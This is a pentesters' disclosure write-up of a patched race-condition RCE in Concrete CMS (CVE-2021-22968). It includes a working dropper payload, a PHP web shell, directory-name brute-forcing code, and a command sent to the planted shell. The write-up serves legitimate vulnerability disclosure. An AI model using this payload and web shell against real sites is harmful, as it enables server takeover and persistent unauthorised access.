Multiple Concrete CMS vulnerabilities (part 1 – RCE)

INTRO

Concrete CMS is designed for ease of use, targeting users with minimal technical skills. It enables users to edit site content directly from the page and provides version management for every page, similar to wiki software. Concrete5 also allows users to edit images through an embedded editor on the page. As of 2021, there are over 62,000 live websites built with Concrete CMS.

During a recent pentest, our team found a very interesting vulnerability. Discovering it was relatively simple; putting a POC together, however, was quite challenging, hence this post. CVE-2021-22968 was assigned to the issue, which was fixed in Concrete CMS versions 8.5.7 and 9.0.1. A low-privileged user is needed to exploit this vulnerability and obtain remote command execution.

The vulnerability – a race condition in the file upload

As a limited user you can upload files from remote servers: you enter a URL and the CMS uses curl to download the file and write it locally (or to an AWS S3 bucket). This curl call has a timeout of 60 seconds, which will become relevant later.
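
A minimal sketch of what such a remote-file import looks like in PHP – this is our simplified reconstruction for illustration, not the exact Concrete CMS code:

<?php
// Simplified reconstruction of the remote-file import (not the exact CMS code).
$url                = 'http://attacker.example/test.php'; // attacker-supplied URL
$temporaryDirectory = sys_get_temp_dir();                 // stand-in for the volatile dir
$filename           = 'test.php';

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 60); // the 60-second timeout mentioned above
$data = curl_exec($ch);
curl_close($ch);

file_put_contents($temporaryDirectory . '/' . $filename, $data);
?>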

Now, some of you might be screaming “SSRF!”, which is absolutely fair, but we’ll get to that – and how we bypassed all the SSRF mitigations in place – in the second part of this series.

Some validations are done on the file extension; for example, if you try to download a file with a .php extension, this is what you get:

The validations looked pretty good when we checked the source code, but you know what we realized when tracing the code? The validations are done AFTER the file is downloaded locally! Thus, we have a race condition – our first race condition, because as you will see, we’ll have two race conditions to exploit.
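
In pseudocode, the flawed ordering looks roughly like this – a hedged sketch where downloadWithCurl() and hasAllowedExtension() are hypothetical stand-ins, not the real CMS functions:

<?php
// Hedged sketch of the vulnerable ordering – downloadWithCurl() and
// hasAllowedExtension() are hypothetical stand-ins, not the real CMS functions.
function downloadWithCurl($url)     { return "<?php /* payload */"; } // stub
function hasAllowedExtension($name) { return !preg_match('/\.php$/i', $name); }

$url       = 'http://attacker.example/test.php';
$localPath = sys_get_temp_dir() . '/test.php';

file_put_contents($localPath, downloadWithCurl($url)); // 1. file hits the disk FIRST
if (!hasAllowedExtension(basename($localPath))) {      // 2. extension checked only AFTER
    unlink($localPath); // rejected and cleaned up – but the race window was already open
    throw new Exception('Invalid file extension');
}
?>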

Let’s have a look at the code to see where our file gets downloaded and written:

But where is $temporaryDirectory coming from? There is a special class for this called VolatileDirectory, which creates a temporary directory that gets deleted at the end of each request.

As you can see, a new directory gets created and our file will be written there. The directory name is supposed to be random; however, $i will always be 0 in practice, so the only real variability comes from uniqid(), whose behavior we’ll look at in a bit. Another problem is that after the file is imported into the CMS, the entire directory gets deleted, together with the downloaded file:
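
Putting both behaviors together, here is a hedged sketch of a VolatileDirectory-style helper, reconstructed from the description above – not the exact Concrete CMS implementation:

<?php
// Hedged sketch of a VolatileDirectory-style helper, reconstructed from the
// behavior described above – not the exact Concrete CMS implementation.
class VolatileDirectorySketch
{
    private $path;

    public function __construct($parentDirectory)
    {
        $i = 0; // the loop exits on the first pass in practice, so $i stays 0
        do {
            $this->path = $parentDirectory . '/' . $i . uniqid();
            $i++;
        } while (file_exists($this->path));
        mkdir($this->path);
    }

    public function getPath()
    {
        return $this->path;
    }

    public function __destruct()
    {
        // wiped when the request ends: the downloaded file only lives here
        // while the upload request is still executing
        array_map('unlink', glob($this->path . '/*') ?: []);
        rmdir($this->path);
    }
}

$volatile = new VolatileDirectorySketch(sys_get_temp_dir());
echo $volatile->getPath(), "\n"; // e.g. /tmp/061851f2ab3c4d – "0" + uniqid()
?>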

Uniqid() behaviour

OK, so as we said, let’s check the uniqid() function in the PHP source code to see what it returns:

This is really simple, there’s nothing to be scared of. As you can see, it simply executes gettimeofday(), which returns the current seconds and microseconds, and formats them as "%08x%05x" – eight hex digits of seconds followed by five hex digits of microseconds. The more_entropy parameter is not used in the CMS source code, so there’s no real entropy here: the entire return value is based on seconds/microseconds, and as we know these are highly predictable, so we can bruteforce them. We only need enough time to do it, because in our initial tests a request took about 100ms to execute.
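
That means we can generate every possible directory name for a given second ourselves. A quick sketch – assuming, per the VolatileDirectory code above, that the name is the $i counter (always 0) followed by uniqid(), and that $sec is synced with the server clock via the Date response header:

<?php
// Enumerate all 1,000,000 possible uniqid() values for one epoch second.
// $sec is assumed to match the server's clock (sync via the Date response header).
$sec = time();
for ($usec = 0; $usec < 1000000; $usec++) {
    // "0" is the $i counter from VolatileDirectory, which stays 0 in practice
    echo '0' . sprintf('%08x%05x', $sec, $usec) . "\n";
}
?>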

We need a plan

So basically, in order to guess the name of the “random” directory, we need to guess the second and microsecond that the server will use. The second is easy: we sync our host’s time with the server time based on the response headers, and we place our attack server in the same time zone or AWS region, as close as possible to the target. But a request takes about 100ms to execute, so we need to extend the upload request’s execution time as much as possible to leave ourselves time to bruteforce the volatile directory name – there are 1M possible directory names to check, one for each microsecond.

How can we achieve this? Very simple: we add a sleep() of 30-60 seconds to the test.php file which gets downloaded from the remote server. This forces the CMS to keep the volatile directory on the local filesystem for 30-60 seconds before deleting it – enough time for us to bruteforce the directory name with Turbo Intruder. When we hit the existing directory, we get back a 200 HTTP response code. Below is the test.php file which we used (this PHP file echoes another PHP file; the echoed PHP code will write a PHP shell in the parent directory):

<?php
// test.php – hosted on our attack server. The CMS downloads this file's
// OUTPUT (what we echo below), not its source.
set_time_limit(0);
sleep(35); // stall the curl download so the volatile dir stays alive for ~35s
// The echoed code is what lands on the victim; when one of our bruteforce
// requests executes it, it drops a permanent shell in the parent directory.
echo '<?php file_put_contents("../shell.php","<?php system(\$_GET[c]) ;");';
echo '?>' . str_repeat("A",50000000); // ~50MB of padding to prolong the transfer
flush();
ob_flush();
?>
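
To be clear about the escaping: the outer string above is single-quoted, so the \$ survives verbatim, and the file the CMS downloads and writes into the volatile directory is the following output (A-padding truncated here):

<?php file_put_contents("../shell.php","<?php system(\$_GET[c]) ;");?>AAAA...

Only when one of our requests executes this file on the target does the double-quoted inner string turn \$_GET into $_GET, producing the final shell.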

Here’s a diagram of all the relevant moments of the attack; hopefully this will make things a bit clearer.

Timing of the relevant race conditions
  • at T0 you start the upload request AND also start searching for the volatile dir name. You have 1M possibilities; we managed to send 16-17K RPS, so you can easily bruteforce 500-700K of them in ~30 seconds – at least a 50% chance, which works great (see the back-of-envelope sketch after this list). We didn’t queue 1M requests, due to some issues with Turbo Intruder.
  • at T1, you have found the volatile dir name (won the first race), but test.php hasn’t been written to the directory yet. Thus you have to start searching for test.php (the 2nd race condition), which will ALWAYS be written ~30 seconds after T0. We queue another 500K requests in Turbo Intruder for this.
  • at T2 (~ 30th second) test.php is written locally, inside the volatile dir
  • at T3, one of the queued requests from T1 hits test.php; executing it writes a permanent shell in the parent directory (“/application/files/tmp”) – we won the second race
  • at T4 both volatile dir and test.php inside get deleted, but we already have a shell 🙂
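
As a sanity check, here is the back-of-envelope math behind the T0 bullet, using the 16-17K RPS mentioned above (16,500 assumed here):

<?php
// Coverage estimate for the first race, assuming ~16,500 requests/second.
$rps     = 16500;
$window  = 30;                     // seconds the sleep() keeps the volatile dir alive
$covered = $rps * $window;         // ≈ 495,000 of the 1,000,000 candidates
printf("%.0f%% of the microsecond space covered\n", 100 * $covered / 1000000);
?>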

Once we have guessed the directory name, we request test.php, which writes a permanent shell in the parent directory. Here’s a screenshot from Turbo Intruder with the guessed directory name:

The second race condition

By making test.php execute for ~30 seconds so that we can guess the directory name, we have created a second race condition. We no longer know exactly when test.php will be written to the CMS filesystem, but it will obviously happen after it finishes its own execution on the remote server (the sleep time plus a few more milliseconds). In practice this means that if we guessed the directory name in the 10th second, we have to queue another 500K-1M requests in Turbo Intruder to cover the whole interval until test.php gets written to the filesystem. Worst case scenario, you have to keep sending requests for another ~30 seconds.

You can see in the screenshot above (tail -f access_log) how we keep sending requests for test.php inside the directory we guessed earlier. Once test.php is found and executed, it writes a permanent shell in the parent directory.

RCE

We hope things have been pretty clear so far; here’s our shell that gives us RCE & persistence:
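
Based on the payload above, the permanent shell written to /application/files/tmp/shell.php contains just:

<?php system($_GET[c]) ;

which lets us run arbitrary commands with a request like (target host hypothetical):

curl 'http://target/application/files/tmp/shell.php?c=id'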

Discovering this vulnerability was relatively easy; putting a POC together, however, was a very time-consuming activity. We also had to work around a few Turbo Intruder issues, which resulted in this issue and a few others – thanks to @albinowax for addressing them. All the code is published here.

Tips

  • the timeout for curl is 60s – do not sleep() for more than 60s in test.php
  • use HTTP/2 if possible
  • use tail -f access_log and tail -f error_log to monitor your requests and any errors
  • check that your upload request from request.txt still has a valid session
  • the upload request is bound to a single IP by default

Timeline

  • 30/10/2021 report sent to the vendor
  • 08/11/2021 patch released (versions 8.5.7/9.0.1)
  • 15/11/2021 published this write-up